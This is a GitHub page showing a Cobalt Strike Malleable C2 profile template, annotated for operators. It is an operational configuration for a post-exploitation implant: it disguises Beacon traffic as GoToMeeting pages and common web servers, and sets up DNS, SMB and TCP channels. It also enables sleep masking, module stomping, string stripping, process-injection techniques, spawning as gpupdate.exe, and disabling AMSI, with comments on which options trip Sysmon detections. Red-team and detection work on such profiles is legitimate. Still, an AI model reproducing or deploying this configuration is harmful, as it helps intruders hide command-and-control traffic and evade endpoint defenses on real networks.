-
-
Notifications
You must be signed in to change notification settings - Fork 47
/
template.profile
518 lines (385 loc) · 14.1 KB
/
template.profile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
#template profile - updated with 4.x options, added sections for new variant options. Variants can be used on http-get, http-post, http-stager, and https-certificate blocks.
#options from https://www.cobaltstrike.com/help-malleable-c2 and https://www.cobaltstrike.com/help-malleable-postex
#attempt to get everything in one place with examples.
#xx0hcd
###global options###
#shows profile name in reports.
set sample_name "whatever.profile";
set sleeptime "37500";
set jitter "33";
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36";
#set true to use staged payloads, false to disable staged payloads.
#set host_stage "false";
###DNS options###
set dns_idle "8.8.8.8";
set maxdns "245";
set dns_sleep "0";
set dns_stager_prepend "";
set dns_stager_subhost "";
set dns_max_txt "252";
set dns_ttl "1";
###SMB options###
#use different strings for pipename and pipename_stager.
set pipename "ntsvcs";
set pipename_stager "scerpc";
set smb_frame_header "";
###TCP options###
set tcp_port "8000";
set tcp_frame_header "";
###SSH Banner###
set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
###SSL Options###
#custom cert
#https-certificate {
#set keystore "your_store_file.store";
#set password "your_store_pass";
#}
#self sign cert
https-certificate {
set C "US";
set CN "whatever.com";
set L "California";
set O "whatever LLC.";
set OU "local.org";
set ST "CA";
set validity "365";
}
###HTTPS_CERTIFICATE VARIANT###
#https-certificate "varinat_name_self" {
# set C "US";
# set CN "whatever2.com";
# set L "Florida";
# set O "whatever2 LLC.";
# set OU "local.org";
# set ST "FL";
# set validity "365";
#}
#code sign cert.
#code-signer {
#set keystore "your_keystore.jks";
#set password "your_password";
#set alias "server";
#}
###HTTP-Config Block###
#Order of server response headers. Or you can just fill them in manually under the server blocks.
http-config {
set headers "Server, Content-Type, Cache-Control, Connection";
header "Content-Type" "text/html;charset=UTF-8";
header "Connection" "close";
header "Cache-Control" "max-age=2";
header "Server" "nginx";
#set "true" if teamserver is behind redirector
set trust_x_forwarded_for "false";
}
###HTTP-GET Block###
#the http-get block checks if there are tasks queued.
http-get {
#You can specifiy multiple URI's with space between them.
set uri "/login /config /admin";
#default method is GET.
set verb "GET";
#set verb "POST";
client {
#Set headers based on traffic capture/Burp/etc.
header "Host" "whatever.com";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Connection" "close";
metadata {
#Encoding options = append "string", base64, base64url, mask, netbios, netbiosu, prepend "string".
#base64
base64url;
#mask;
#netbios;
#netbiosu;
#prepend "TEST123";
append ".php";
#Termination statements = header "header", parameter "key", print, uri-append.
parameter "file";
#header "Cookie";
#uri-append;
#Have to set verb to POST if you want to use print in the client GET block.
#print;
}
#You can also add parameter values just to help mimic your site traffic.
parameter "test1" "test2";
}
server {
#headers are defined in the http-config block above, or you can set them manually here.
#header "Server" "nginx";
#the output keyword allows you to prepend/append data, to add site traffic, etc.
output {
netbios;
#netbiosu;
#base64;
#base64url;
#mask;
#Use prepend and append to mix your data in with normal looking site traffic. Escape double quotes and you can also use '\n'. c2lint shows '\n' as a period, but you can run it through Burp or pcap a HTTP payload to make sure everything is lining up correctly. Prepend strings need to be entered in reverse order, so the first string here is '"<!DOCTYPE html>\n";'.
prepend "content=";
prepend "<meta name=\"google-site-verification\"\n";
prepend "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n";
prepend "<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n";
prepend "<link rel=\"canonical\" href=\"https://www.gotomeeting.com/b\">\n";
prepend "<title>Online Meeting Software with HD Video Conferencing | GoToMeeting</title>\n";
prepend " <meta charset=\"UTF-8\">\n";
prepend " <head>\n";
prepend "<html lang=\"en\">\n";
prepend "<!DOCTYPE html>\n";
append "\n<meta name=\"msvalidate.01\" content=\"63E628E67E6AD849F4185FA9AA7ABACA\">\n";
append "<script type=\"text/javascript\">\n";
append " var _kiq = _kiq || [];\n";
append " (function(){\n";
append " setTimeout(function(){\n";
append " var d = document, f = d.getElementsByTagName('script')[0], s =\n";
append "d.createElement('script'); s.type = 'text/javascript';\n";
append " s.async = true; s.src = '//s3.amazonaws.com/ki.js/66992/fWl.js';\n";
append "f.parentNode.insertBefore(s, f);\n";
append " }, 1);\n";
append "})();\n";
append "</script>\n";
append "</body>\n";
append "</html>\n";
#All server blocks use 'print' to termintate.
print;
}
}
}
###HTTP-GET VARIANT###
#variants allow you to use multiple traffic profiles with a single teamserver. Define the block as normal adding a name for the variant in quotes.
http-get "variant_name_get" {
set uri "/index";
client {
header "Accept" "*/*";
header "Connection" "Keep-Alive";
metadata {
base64url;
parameter "id";
}
parameter "param_key" "value";
}
server {
header "Server" "Apache";
output {
netbios;
prepend "<html>\n";
append "'\n";
print;
}
}
}
###HTTP-Post Block###
#The same transform and termination rules apply as the client GET section above.
#if tasks are queued then http-post block processes them.
http-post {
#URI's cannot be the same as the http-get block URI's, even changing one case is fine.
set uri "/Login /Config /Admin";
set verb "GET";
#set verb "POST";
client {
header "Host" "whatever.com";
header "Accept" "*/*";
header "Accept-Language" "en";
header "Connection" "close";
output {
base64url;
parameter "testParam";
}
#You can put the beacon id in - parameter "key", header "header",
#cannot add transform statements to beacon id.
id {
base64url;
parameter "id";
#header "ID-Header":
}
}
server {
#headers are defined in the http-config block above, or you can set them manually here.
#header "Server" "nginx";
output {
netbios;
prepend "content=";
prepend "<meta name=\"google-site-verification\"\n";
prepend "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n";
prepend "<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n";
prepend "<link rel=\"canonical\" href=\"https://www.gotomeeting.com/b\">\n";
prepend "<title>Online Meeting Software with HD Video Conferencing | GoToMeeting</title>\n";
prepend " <meta charset=\"UTF-8\">\n";
prepend " <head>\n";
prepend "<html lang=\"en\">\n";
prepend "<!DOCTYPE html>\n";
append "\n<meta name=\"msvalidate.01\" content=\"63E628E67E6AD849F4185FA9AA7ABACA\">\n";
append "<script type=\"text/javascript\">\n";
append " var _kiq = _kiq || [];\n";
append " (function(){\n";
append " setTimeout(function(){\n";
append " var d = document, f = d.getElementsByTagName('script')[0], s =\n";
append "d.createElement('script'); s.type = 'text/javascript';\n";
append " s.async = true; s.src = '//s3.amazonaws.com/ki.js/66992/fWl.js';\n";
append "f.parentNode.insertBefore(s, f);\n";
append " }, 1);\n";
append "})();\n";
append "</script>\n";
append "</body>\n";
append "</html>\n";
print;
}
}
}
###HTTP-POST VARIANT###
#variants allow you to use multiple traffic profiles with a single teamserver. Define the block as normal adding a name for the variant in quotes.
http-post "variant_name_post" {
set uri "/html";
#set verb "GET";
set verb "POST";
client {
header "Accept" "*/*";
header "Connection" "Keep-Alive";
output {
base64url;
parameter "name";
}
id {
base64url;
parameter "id";
}
}
server {
header "Server" "Apache";
output {
netbios;
print;
}
}
}
###HTTP-Stager Block###
#Options to set if you are using a staged payload.
http-stager {
#Same URI rules apply as above, can't have URI's that match in any other client block.
set uri_x86 "/Console";
set uri_x64 "/console";
client {
header "Host" "whatever.com";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Connection" "close";
#can use a parameter as well
parameter "test1" "test2";
}
server {
#headers are defined in the http-config block above, or you can set them manually here.
#header "Server" "nginx";
output {
prepend "content=";
append "</script>\n";
print;
}
}
}
###HTTP-Stager Variant###
#variants allow you to use multiple traffic profiles with a single teamserver. Define the block as normal adding a name for the variant in quotes.
http-stager "variant_name_stager" {
set uri_x86 "/uri1";
set uri_x64 "/uri2";
client {
header "Host" "whatever.com";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Connection" "close";
#can use a parameter as well
parameter "test1" "test2";
}
server {
#headers are defined in the http-config block above, or you can set them manually here.
#header "Server" "nginx";
output {
prepend "content=";
append "</script>\n";
print;
}
}
}
###Malleable PE/Stage Block###
#use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually.
#don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though.
stage {
set checksum "0";
set compile_time "25 Oct 2016 01:57:23";
set entry_point "170000";
#set image_size_x86 "6586368";
#set image_size_x64 "6586368";
#set name "WWanMM.dll";
set userwx "false";
set cleanup "true";
set sleep_mask "true";
set stomppe "true";
set obfuscate "true";
set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
#obfuscate beacon before sleep.
set sleep_mask "true";
#https://www.cobaltstrike.com/releasenotes.txt -> + Added option to bootstrap Beacon in-memory without walking kernel32 EAT
set smartinject "true";
#module stomp. Make sure the dll you use is bigger than your payload and test it with post exploit options to make sure everything is working.
set module_x86 "wwanmm.dll";
set module_x64 "wwanmm.dll";
#transform allows you to remove, replace, and add strings to beacon's reflective dll stage.
transform-x86 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "";
strrep "beacon.dll" "";
}
transform-x64 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "";
strrep "beacon.x64.dll" "";
}
#can set a string in the .rdata section of the beacon dll.
#adds a zero-terminated string
#string "something";
#adds a string 'as-is'
#data "something";
#adds a wide (UTF-16LE encoded) string
stringw "something";
}
###Process Inject Block###
#controls process injection behavior
process-inject {
#Can use NtMapViewOfSection or VirtualAllocEx
#NtMapViewOfSection only allows same arch to same arch process injection.
set allocator "NtMapViewOfSection";
set min_alloc "16700";
set userwx "false";
set startrwx "true";
#prepend has to be valid code for current arch
transform-x86 {
prepend "\x90\x90\x90";
}
transform-x64 {
prepend "\x90\x90\x90";
}
execute {
#Options to spoof start address for CreateThread and CreateRemoteThread, +0x<nums> for offset added to start address. docs recommend ntdll and kernel32 using remote process.
#start address does not point to the current process space, fires SYSMON 8 events
#CreateThread;
#CreateRemoteThread;
#self injection
CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
#suspended process in post-ex jobs, takes over primary thread of temp process
SetThreadContext;
#early bird technique, creates a suspended process, queues an APC call to the process, resumes main thread to execute the APC.
NtQueueApcThread-s;
#uses an RWX stub, uses CreateThread with start address that stands out, same arch injection only.
#NtQueueApcThread;
#no cross session
CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
#uses an RWX stub, fires SYSMON 8 events, does allow x86->x64 injection.
RtlCreateUserThread;
}
}
###Post-Ex Block###
post-ex {
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
set obfuscate "true";
set smartinject "true";
set amsi_disable "true";
}